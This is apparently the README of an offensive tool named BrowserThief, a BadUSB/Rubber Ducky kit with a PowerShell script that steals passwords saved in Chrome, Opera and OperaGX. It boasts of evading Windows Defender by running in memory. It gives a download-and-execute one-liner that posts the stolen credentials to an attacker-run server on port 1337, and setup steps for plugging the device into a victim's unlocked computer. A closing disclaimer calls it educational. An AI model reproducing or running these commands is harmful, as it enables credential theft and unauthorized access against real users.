BrowserThief

All in one Rubber Ducky/BadUSB that runs a powershell script to extract and steal browser-saved passwords and stash them at your Flask web server. It currently extract passwords from Opera/OperaGX/Chrome, I will be adding support for more browsers like Firefox soon!

Features

The powershell script runs in-memory and avoids writing to disk which evades Windows Defender detection
Powershell execution policy doesn't affect it whatsoever
Includes an arduino RubberDucky script that runs in less than 2 seconds
Extracts Passwords from all Chrome Profiles, Opera and OperaGX
Will be adding Firefox soon

Setup

Setup the web server that catches the passwords

foo@bar:~$ sudo apt install docker.io

foo@bar:~$ git clone https://github.com/ScribblerCoder/BrowserThief

foo@bar:~$ cd BrowserThief/Web

foo@bar:~$ sudo bash build-docker.sh

Instructions

finish Setup first!
simply run the powershell script

iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/ScribblerCoder/BrowserThief/main/BrowserThief.ps1');pumpndump -hq http://<Your-IP>:1337;exit

Or you can use the rubber ducky for stealth/speed
- Needs an Arduino that supports <Keyboard.h> (Nano, Leonardo)
- Install Arduino IDE from their website
- Open RubberDuckyScript.ino using the IDE and replace https://dump.silvercryptor.xyz with your IP, check out Setup to setup the Web server
- Compile and upload the script to the arduino
- Insert the usb to the victim's computer (needs to be unlocked)
- Profit 💰💰💰

PoC

Victim POV

Just plug your bad usb and watch the magic

Attacker POV

Credits

This project wouldn't exist without the guidance of these examples

Disclaimer

This is for educational purposes only. I bear no responsiblity for misuses of this project

CodeBreaker44/BrowserThief